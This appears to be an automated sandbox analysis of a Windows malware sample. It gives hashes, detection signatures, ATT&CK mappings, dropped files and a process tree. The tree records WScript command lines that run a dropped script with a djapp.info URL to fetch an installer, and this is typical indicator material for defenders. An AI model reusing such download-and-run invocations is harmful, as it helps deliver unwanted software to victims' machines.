ffcecf8a93a7e5c5e8b747d366e0436f5e425857b1aa1f78670dbdd725eefd64

Analysis

max time kernel
117s
max time network
121s
platform
windows7_x64
resource
win7-20230712-en
resource tags

arch:x64arch:x86image:win7-20230712-enlocale:en-usos:windows7-x64system
submitted
02-08-2023 17:39

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

3cafcb12bf18a5ed0c0e461e63937b8d_mafia_JC.exe
Size

184KB
MD5

3cafcb12bf18a5ed0c0e461e63937b8d
SHA1

15d58623080f3becc6a880a5ae2811b6360627d3
SHA256

ffcecf8a93a7e5c5e8b747d366e0436f5e425857b1aa1f78670dbdd725eefd64
SHA512

d59a98dd41fabfb618f1f7b5276c41b795cfdf9b61c5e20b75640ceab856bc7163783be202114d2bd7b9c7661e3d0b9bf6d6ea81cbccd670ec179bd7a722ba72
SSDEEP

3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3c7:/7BSH8zUB+nGESaaRvoB7FJNndnB

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 11 IoCs

flow	pid	Process
6	2524	WScript.exe
8	2524	WScript.exe
11	2524	WScript.exe
15	2964	WScript.exe
16	2964	WScript.exe
18	2760	WScript.exe
19	2760	WScript.exe
21	1192	WScript.exe
22	1192	WScript.exe
24	2020	WScript.exe
25	2020	WScript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
2948	1716	WerFault.exe	27

Suspicious use of WriteProcessMemory 24 IoCs

description	pid	Process	procid_target
PID 1716 wrote to memory of 2524	1716	3cafcb12bf18a5ed0c0e461e63937b8d_mafia_JC.exe	28
PID 1716 wrote to memory of 2524	1716	3cafcb12bf18a5ed0c0e461e63937b8d_mafia_JC.exe	28
PID 1716 wrote to memory of 2524	1716	3cafcb12bf18a5ed0c0e461e63937b8d_mafia_JC.exe	28
PID 1716 wrote to memory of 2524	1716	3cafcb12bf18a5ed0c0e461e63937b8d_mafia_JC.exe	28
PID 1716 wrote to memory of 2964	1716	3cafcb12bf18a5ed0c0e461e63937b8d_mafia_JC.exe	32
PID 1716 wrote to memory of 2964	1716	3cafcb12bf18a5ed0c0e461e63937b8d_mafia_JC.exe	32
PID 1716 wrote to memory of 2964	1716	3cafcb12bf18a5ed0c0e461e63937b8d_mafia_JC.exe	32
PID 1716 wrote to memory of 2964	1716	3cafcb12bf18a5ed0c0e461e63937b8d_mafia_JC.exe	32
PID 1716 wrote to memory of 2760	1716	3cafcb12bf18a5ed0c0e461e63937b8d_mafia_JC.exe	34
PID 1716 wrote to memory of 2760	1716	3cafcb12bf18a5ed0c0e461e63937b8d_mafia_JC.exe	34
PID 1716 wrote to memory of 2760	1716	3cafcb12bf18a5ed0c0e461e63937b8d_mafia_JC.exe	34
PID 1716 wrote to memory of 2760	1716	3cafcb12bf18a5ed0c0e461e63937b8d_mafia_JC.exe	34
PID 1716 wrote to memory of 1192	1716	3cafcb12bf18a5ed0c0e461e63937b8d_mafia_JC.exe	36
PID 1716 wrote to memory of 1192	1716	3cafcb12bf18a5ed0c0e461e63937b8d_mafia_JC.exe	36
PID 1716 wrote to memory of 1192	1716	3cafcb12bf18a5ed0c0e461e63937b8d_mafia_JC.exe	36
PID 1716 wrote to memory of 1192	1716	3cafcb12bf18a5ed0c0e461e63937b8d_mafia_JC.exe	36
PID 1716 wrote to memory of 2020	1716	3cafcb12bf18a5ed0c0e461e63937b8d_mafia_JC.exe	38
PID 1716 wrote to memory of 2020	1716	3cafcb12bf18a5ed0c0e461e63937b8d_mafia_JC.exe	38
PID 1716 wrote to memory of 2020	1716	3cafcb12bf18a5ed0c0e461e63937b8d_mafia_JC.exe	38
PID 1716 wrote to memory of 2020	1716	3cafcb12bf18a5ed0c0e461e63937b8d_mafia_JC.exe	38
PID 1716 wrote to memory of 2948	1716	3cafcb12bf18a5ed0c0e461e63937b8d_mafia_JC.exe	40
PID 1716 wrote to memory of 2948	1716	3cafcb12bf18a5ed0c0e461e63937b8d_mafia_JC.exe	40
PID 1716 wrote to memory of 2948	1716	3cafcb12bf18a5ed0c0e461e63937b8d_mafia_JC.exe	40
PID 1716 wrote to memory of 2948	1716	3cafcb12bf18a5ed0c0e461e63937b8d_mafia_JC.exe	40

C:\Users\Admin\AppData\Local\Temp\3cafcb12bf18a5ed0c0e461e63937b8d_mafia_JC.exe
"C:\Users\Admin\AppData\Local\Temp\3cafcb12bf18a5ed0c0e461e63937b8d_mafia_JC.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1716
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufCB0C.js" http://www.djapp.info/?domain=TpNHJLWJSZ.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuVwucrPYE19JkwWjSZ2s2qvmGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4eNq6LaFY79XZ6m0stLMqjuzx-uhliieAKdKyysjy6-7bTV8zh C:\Users\Admin\AppData\Local\Temp\fufCB0C.exe
  2⤵
  - Blocklisted process makes network request
  PID:2524
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufCB0C.js" http://www.djapp.info/?domain=TpNHJLWJSZ.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuVwucrPYE19JkwWjSZ2s2qvmGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4eNq6LaFY79XZ6m0stLMqjuzx-uhliieAKdKyysjy6-7bTV8zh C:\Users\Admin\AppData\Local\Temp\fufCB0C.exe
  2⤵
  - Blocklisted process makes network request
  PID:2964
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufCB0C.js" http://www.djapp.info/?domain=TpNHJLWJSZ.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuVwucrPYE19JkwWjSZ2s2qvmGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4eNq6LaFY79XZ6m0stLMqjuzx-uhliieAKdKyysjy6-7bTV8zh C:\Users\Admin\AppData\Local\Temp\fufCB0C.exe
  2⤵
  - Blocklisted process makes network request
  PID:2760
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufCB0C.js" http://www.djapp.info/?domain=TpNHJLWJSZ.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuVwucrPYE19JkwWjSZ2s2qvmGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4eNq6LaFY79XZ6m0stLMqjuzx-uhliieAKdKyysjy6-7bTV8zh C:\Users\Admin\AppData\Local\Temp\fufCB0C.exe
  2⤵
  - Blocklisted process makes network request
  PID:1192
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufCB0C.js" http://www.djapp.info/?domain=TpNHJLWJSZ.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuVwucrPYE19JkwWjSZ2s2qvmGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4eNq6LaFY79XZ6m0stLMqjuzx-uhliieAKdKyysjy6-7bTV8zh C:\Users\Admin\AppData\Local\Temp\fufCB0C.exe
  2⤵
  - Blocklisted process makes network request
  PID:2020
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 1716 -s 268
  2⤵
  - Program crash
  PID:2948

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\82CB34DD3343FE727DF8890D352E0D8F

Filesize
7KB

MD5
780123af42eca2dc0e294af5fc1a5514

SHA1
a7bebb0729cd2ea7bf08ba7894999cabf4d7f79e

SHA256
005007e68c8b090034ab09e1199e1c0d570871b3e95c73330e5885e51f3a4233

SHA512
95243d724cee03bdb40b83f9081759dd2ec605533cc9e55a77c250a41fb70ac4cba83373f2b35b3487112c7e48f20ed302872a9103b3970d4d2286953e018582

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\82CB34DD3343FE727DF8890D352E0D8F

Filesize
232B

MD5
65c015ac38f1d80344736998f639ca67

SHA1
f11f9a6ada6be547b7fbb869732b97d848176176

SHA256
5654318b9efab7de7eed580dddfe4a8ba7630692560c8b8b61c4f6c8eaedbb1b

SHA512
2190c24ef7ccc13cb61d394c42d8d7d12c7d7d9e6d623568757b5f0ae4983ebacc0d909df61c89e38689bf9fb4f4d18d3f5b7e8a6858deb595e2f656e16d2eb1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\12APMO2Y\domain_profile[1].htm

Filesize
40KB

MD5
e5bdf2ab55ef75869942906a4f4573cf

SHA1
ba3b4aa64283da72457b7f848839fcf7aa47bb51

SHA256
58e938b82f830ece69a9470db17521c961188153073df433027bb7782cb9c2ce

SHA512
f25e97de775743d0fbc084118f5717b52d9daacb700edd1242fa6845f028af5dd87c2ad1aef313e24c6b6ba90157baaee55a71ba29df10218952b2484c14c55b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\12APMO2Y\domain_profile[1].htm

Filesize
40KB

MD5
94e9cc1c9a204a02403d01bef4ccc501

SHA1
072397ded0e03c8a1322662be162ea541fbaa579

SHA256
948770bb5ddde9b3f236018705d0c56e22cff1064bffc08b8bc9c283a36722cb

SHA512
7b2fd05d9bca360423f8b2d8953523145de61ea1a19b741891992892c993f189d473c1c90583cac3dcdbd5b4a6fe126efa1a826b6598e95253b1cbb7ac2d23fe

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\TGCFYHZ3\domain_profile[1].htm

Filesize
40KB

MD5
894509c6144a85df8aa6fb6b9d069ae9

SHA1
36c5789e15633ca2375f2461e3831bf2198d49fe

SHA256
0d7db028a33bda2a14d6bbedb4a42f6e6ec6d711f20b2b7c36f1ce3d18e34c45

SHA512
58c7c1da00c4afd0bca41090d29562f45b320dcc69e1480dd8ea9ba173469158800d9dbf9cdb6d0cf3b9c91994555b111e8a555cdd10e033c752a76077393140

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\TGCFYHZ3\domain_profile[1].htm

Filesize
40KB

MD5
5a3452025a57f5b63df9df6f7450f746

SHA1
233b0e1c0d8787eda343f1951dd6120ca8772461

SHA256
ce121a9b7688168399aa710ac1c3ddd45da6574cc86843cda43924a746e807cf

SHA512
0b89f84030d2d7a092ab293058e979cc1ba8aa09206c27a278d08b32cfee3c6dd7321b68104be436fdf1e6034ca71bed15b1d98144fea686e6864c7f3f92ecd3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\TGCFYHZ3\domain_profile[1].htm

Filesize
40KB

MD5
821e225ea24d472b1365689bb19ebce3

SHA1
a5c5df3451c02bf5bba0869155f8123c3ca335f2

SHA256
d3c6b35d2d1e06b8d810f49372ee176a724dcf2e558cf206daa85e24df8cca99

SHA512
3757fc78192a4cbd39e8af8f5260cde68f646d9f8cde852a6396d46790b2917f7ceea5b5d07384f1fb5a5b46ac862cff1e79f784771767198dfe6d54d4a92578

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab4328.tmp

Filesize
62KB

MD5
3ac860860707baaf32469fa7cc7c0192

SHA1
c33c2acdaba0e6fa41fd2f00f186804722477639

SHA256
d015145d551ecd14916270efad773bbc9fd57fad2228d2c24559f696c961d904

SHA512
d62ad2408c969a95550fb87efda50f988770ba5e39972041bf85924275baf156b8bec309ecc6409e5acdd37ec175dea40eff921ab58933b5b5b5d35a6147567c

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar5B7A.tmp

Filesize
164KB

MD5
4ff65ad929cd9a367680e0e5b1c08166

SHA1
c0af0d4396bd1f15c45f39d3b849ba444233b3a2

SHA256
c8733c93cc5aaf5ca206d06af22ee8dbdec764fb5085019a6a9181feb9dfdee6

SHA512
f530dc0d024a5a3b8903ffaaa41b608a5ccdd6da4ba1949f2c2e55a9fca475fec5c8d2119b5763cabe7ef1c3788fb9dcac621869db51d65b1d83cfe404fb4c27

Download Submit
C:\Users\Admin\AppData\Local\Temp\fufCB0C.js

Filesize
3KB

MD5
3813cab188d1de6f92f8b82c2059991b

SHA1
4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

SHA256
a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

SHA512
83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\7NSGDDSK.txt

Filesize
175B

MD5
856c943ef3c2146f2767720814c6a422

SHA1
b9c58e31e18578b036ad8e6d44892a73f9c8c7f5

SHA256
f7717eea553b281f3d7d3376796dcc669f966151e81066bc5af3fee226dc6d00

SHA512
cffe12d3823e526d37997743c6fe71f45d5661c05a6d673725f51c70fbe91d60b37dfd3e30db9af636a3508f95fdb28182765d61139e584820c27650826c3b0a

Download Submit